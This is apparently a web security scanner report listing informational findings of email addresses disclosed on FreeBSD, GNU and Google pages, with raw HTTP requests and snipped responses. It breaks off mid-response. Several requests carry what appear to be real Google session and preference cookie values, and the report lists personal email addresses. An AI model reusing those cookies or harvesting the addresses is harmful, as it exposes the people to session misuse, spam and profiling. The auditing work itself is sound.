<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jacs@gnome.co.uk">jacs@gnome.co.uk</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:novel@FreeBSD.org">novel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sanpei@FreeBSD.org">sanpei@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stephen@missouri.edu">stephen@missouri.edu</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:marius@nuenneri.ch">marius@nuenneri.ch</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:naddy@FreeBSD.org">naddy@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sec@42.org">sec@42.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:c0rn@o2.pl">c0rn@o2.pl</A>
...[SNIP]...
<A HREF="mailto:katsura@cc.osaka-kyoiku.ac.jp">katsura@cc.osaka-kyoiku.ac.jp</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@eitanadler.com">ports@eitanadler.com</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:matt@bdd.net">matt@bdd.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joerg@FreeBSD.org">joerg@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.Org">ports@FreeBSD.Org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:g.veniamin@googlemail.com">g.veniamin@googlemail.com</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alexander.pohoyda@gmx.net">alexander.pohoyda@gmx.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:decept0@gmail.com">decept0@gmail.com</A>
...[SNIP]...
<A HREF="mailto:decept0@gmail.com">decept0@gmail.com</A>
...[SNIP]...
<A HREF="mailto:tdb@FreeBSD.org">tdb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lazyklimm@gmail.com">lazyklimm@gmail.com</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gugod@gugod.org">gugod@gugod.org</A>
...[SNIP]...
<A HREF="mailto:sunrychen@gmail.com">sunrychen@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:darcsis@gmail.com">darcsis@gmail.com</A>
...[SNIP]...

24.322. http://www.freebsd.org/releng/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /releng/

Issue detail

The following email addresses were disclosed in the response:
  • freebsd-doc@FreeBSD.org
  • freebsd-www@FreeBSD.org
  • portmgr@FreeBSD.org
  • re-alpha@FreeBSD.org
  • re-amd64@FreeBSD.org
  • re-ia64@FreeBSD.org
  • re-pc98@FreeBSD.org
  • re-ppc@FreeBSD.org
  • re-sparc64@FreeBSD.org
  • re-x86@FreeBSD.org
  • re@FreeBSD.org
  • security-officer@FreeBSD.org

Request

GET /releng/ HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1693373868"
Last-Modified: Fri, 31 Dec 2010 18:24:41 GMT
Content-Length: 19990
Connection: close
Date: Mon, 24 Jan 2011 16:20:17 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...

24.323. http://www.freebsd.org/send-pr.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /send-pr.html

Issue detail

The following email address was disclosed in the response:
  • bugbusters@FreeBSD.org

Request

GET /send-pr.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2587588304"
Last-Modified: Tue, 04 Jan 2011 20:39:09 GMT
Content-Length: 12238
Connection: close
Date: Mon, 24 Jan 2011 16:39:38 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
<a
href="mailto:bugbusters@FreeBSD.org">
...[SNIP]...
<img src="http://www.FreeBSD.org/cgi/confirm-code.cgi?db=sendpr"
alt="Random text; if you cannot see the image, please email bugbusters@FreeBSD.org"
height="24" border="0" />
...[SNIP]...

24.324. http://www.freebsd.org/usergroups.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /usergroups.html

Issue detail

The following email addresses were disclosed in the response:
  • 22961476@students.ukdw.ac.id
  • admin@mnbsd.org
  • bsd-dk-request@bsd-dk.dk
  • bsd-il@libagent.org
  • buug-request@weak.org
  • contacto@bsd-peru.org
  • ernesto@freebsd.mx
  • freebsd-mke-l-request@ns.sol.net
  • freebsd-mke-l@ns.sol.net
  • info@MyBSD.org.my
  • info@bluefrogs.de
  • info@mybsd.org.my
  • info@rlug.org
  • jgrosch@mooseriver.com
  • kbug-admin@kbug.gr.jp
  • kendall@su3g.org
  • kulua@kulua.org
  • listar@rofug.ro
  • majordomo@FreeBSDDiary.org.ua
  • majordomo@lemis.com
  • majordomo@stacken.kth.se
  • majordomo@swcp.com
  • misc+subscribe@capbug.org
  • norcalfulua@gmail.com
  • pbclug@Comcast.net
  • pdx-freebsd@toybox.placo.com
  • ptbsd@yahoo.com
  • rcarter@consys.com
  • rcramer@sytex.net
  • rodrigo@bebik.net
  • sams@bsdgroups.org.uk
  • tcbug@tcbug.org
  • webmaster@svbug.com
  • wuug-list@unixpower.org

Request

GET /usergroups.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "464079767"
Last-Modified: Sun, 02 Jan 2011 00:10:42 GMT
Content-Length: 46552
Connection: close
Date: Mon, 24 Jan 2011 16:39:37 GMT
Server: httpd/1.4.x LaHonda

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org
...[SNIP]...
...[SNIP]...
<a name="oceania-buga" href="mailto:majordomo@lemis.com" id="oceania-buga">
...[SNIP]...
<a
href="mailto:majordomo@lemis.com">majordomo@lemis.com</a>
...[SNIP]...

24.325. http://www.freebsdfoundation.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsdfoundation.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • webmaster@freebsdfoundation.org

Request

GET / HTTP/1.1
Host: www.freebsdfoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:39 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 12801

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-
...[SNIP]...
<meta name="email" content="webmaster@freebsdfoundation.org" />
...[SNIP]...

24.326. http://www.freebsdfoundation.org/donate/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsdfoundation.org
Path:   /donate/

Issue detail

The following email addresses were disclosed in the response:
  • donations@freebsdfoundation.org
  • webmaster@freebsdfoundation.org

Request

GET /donate/ HTTP/1.1
Host: www.freebsdfoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:40 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 10624

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-
...[SNIP]...
<meta name="email" content="webmaster@freebsdfoundation.org" />
...[SNIP]...
<input type="hidden" name="business" value="donations@freebsdfoundation.org">
...[SNIP]...

24.327. http://www.gnu.org/copyleft/gpl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /copyleft/gpl.html

Issue detail

The following email addresses were disclosed in the response:
  • gnu@gnu.org
  • web-translators@gnu.org
  • webmasters@gnu.org
  • you@example.com

Request

GET /copyleft/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:42 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Mon, 24 Jan 2011 16:39:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

24.328. http://www.gnu.org/licenses/gpl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:
  • gnu@gnu.org
  • web-translators@gnu.org
  • webmasters@gnu.org
  • you@example.com

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:02:45 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 25 Jan 2011 00:02:45 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

24.329. http://www.gnu.org/licenses/licenses.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/licenses.html

Issue detail

The following email addresses were disclosed in the response:
  • gnu@gnu.org
  • licensing@fsf.org
  • licensing@gnu.org
  • web-translators@gnu.org
  • webmasters@gnu.org
  • you@example.com

Request

GET /licenses/licenses.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:41 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Mon, 24 Jan 2011 16:39:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 28853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a
href="/licenses/license-list.html#LicensingMailingList">&lt;licensing@fsf.org&gt;
mailing list</a>
...[SNIP]...
<a href="mailto:licensing@gnu.org">
...[SNIP]...
<a
href="mailto:licensing@fsf.org">&lt;licensing@fsf.org&gt;</a>
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

24.330. http://www.gnu.org/licenses/old-licenses/gpl-2.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/old-licenses/gpl-2.0.html

Issue detail

The following email addresses were disclosed in the response:
  • gnu@gnu.org
  • web-translators@gnu.org
  • webmasters@gnu.org
  • you@example.com

Request

GET /licenses/old-licenses/gpl-2.0.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:41 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Mon, 24 Jan 2011 16:39:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

24.331. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:
  • obrien@FreeBSD.org

Request

GET /search?q=aub+assemble+usenet+binary&hl=en&tbo=1&output=search&source=lnt&tbs=qdr:m&sa=X&ei=o5I9Tfm_A4SKlweG35CjBw&ved=0CAcQpwUoBA&fp=9809f9a75fc5a4aa&tch=1&ech=1&psi=hJI9Td-zDaCeevCInIsK12958808728107 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: GeNLY2f-
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:29 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: application/json; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 51131

MsNN-Rbk....S....Y....|.........#..]{e:"pZI9TfOKFcH_lgf0opSUBw",c:1,u:"http://www.google.com/search?q\x3daub+assemble+usenet+binary\x26hl\x3den\x26tbo\x3d1\x26output\x3dsearch\x26source\x3dlnt\x26tbs\
...[SNIP]...
\\x3d\\x22f std\\x22 \\x3eJan 17, 2011\\x3c/span\\x3e - \\x3cem\\x3eaub\\x3c/em\\x3e-2.2_1: \\x3cem\\x3eAssemble usenet binaries\\x3c/em\\x3e. Long description | Sources | Main Web Site Maintained by: obrien@FreeBSD.org \\x26middot; bgrab-1.3.6: \\x3cem\\x3eBinary\\x3c/em\\x3e Grabber - downloads \\x3cb\\x3e...\\x3c/b\\x3e\\x3cbr\\x3e\\x3cspan class\\x3df\\x3e\\x3ccite\\x3ewww.freebsd.org/ports/news.html\\x3c/cite\\
...[SNIP]...

24.332. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:
  • eapeters@chr.ucla.edu

Request

GET /search?hl=en&q=related:www.e&tbo=1&sa=X&ei=3wT0TJ&tbo=1&sa=X&ei=3wT0T&tbo=1&sa=X&ei=3wT0TWJ_5AKtpypmg8&ved=0CJUBEB8wD&tbo=1&sa=X&ei=3wT0TJwww.&tbo=1&sa=X&ei=3wT0TQoQg HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:40:15 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>related:www.e - Google Search</title><script>window.google={kEI:"b6s9TbnNEcSdgQeems2eCA",kEXPI:"17259,17291
...[SNIP]...
</em> to campus employees, please contact Director Elaine Peters at eapeters@chr.ucla.edu, and for Health System employees, <b>
...[SNIP]...

24.333. https://www.google.com/accounts/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The following email address was disclosed in the response:
  • pat@example.com

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
